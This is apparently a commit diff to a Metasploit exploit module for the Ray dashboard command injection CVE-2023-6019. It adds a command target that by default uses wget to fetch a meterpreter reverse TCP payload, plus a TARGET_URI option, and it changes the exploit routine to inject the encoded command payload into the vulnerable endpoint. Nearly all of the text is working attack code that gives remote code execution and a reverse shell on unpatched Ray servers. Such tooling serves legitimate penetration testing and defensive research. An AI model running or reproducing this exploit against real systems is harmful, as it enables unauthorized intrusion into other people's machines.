Enable fetch payload

Takahiro-Yoko · Takahiro-Yoko · commit 01b2a1c55cb9 · 2024-08-20T13:20:42.000+09:00
diff --git a/modules/exploits/linux/http/ray_cpu_profile_cmd_injection_cve_2023_6019.rb b/modules/exploits/linux/http/ray_cpu_profile_cmd_injection_cve_2023_6019.rb
@@ -36,7 +36,16 @@ def initialize(info = {})
         'Targets' => [
           [ 'Linux x64', { 'Arch' => ARCH_X64, 'Platform' => 'linux' } ],
           [ 'Linux x86', { 'Arch' => ARCH_X86, 'Platform' => 'linux' } ],
-          [ 'Linux aarch64', { 'Arch' => ARCH_AARCH64, 'Platform' => 'linux' } ]
+          [ 'Linux aarch64', { 'Arch' => ARCH_AARCH64, 'Platform' => 'linux' } ],
+          [
+            'Linux Command', {
+              'Arch' => [ ARCH_CMD ], 'Platform' => [ 'unix', 'linux' ], 'Type' => :nix_cmd,
+              'DefaultOptions' => {
+                'PAYLOAD' => 'cmd/linux/http/x64/meterpreter_reverse_tcp',
+                'FETCH_COMMAND' => 'WGET'
+              }
+            }
+          ]
         ],
         'DefaultTarget' => 0,
         'DisclosureDate' => '2023-11-15',
@@ -51,6 +60,7 @@ def initialize(info = {})
     register_options(
       [
         Opt::RPORT(8265),
+        Msf::OptString.new('TARGET_URI', [ false, 'URI', '/'])
       ]
     )
   end
@@ -95,7 +105,12 @@ def exploit
     fail_with(Failure::Unknown, 'Failed to get ip') unless first_node.key?('ip')
     ip = first_node['ip']
     print_good("Grabbed node info, pid: #{pid}, ip: #{ip}")
-    execute_cmdstager({ flavor: :wget, pid: pid, ip: ip })
+    case target['Type']
+    when :nix_cmd
+      execute_command(payload.encoded, { pid: pid, ip: ip })
+    else
+      execute_cmdstager({ flavor: :wget, pid: pid, ip: ip })
+    end
   end
 
   def execute_command(cmd, opts = {})
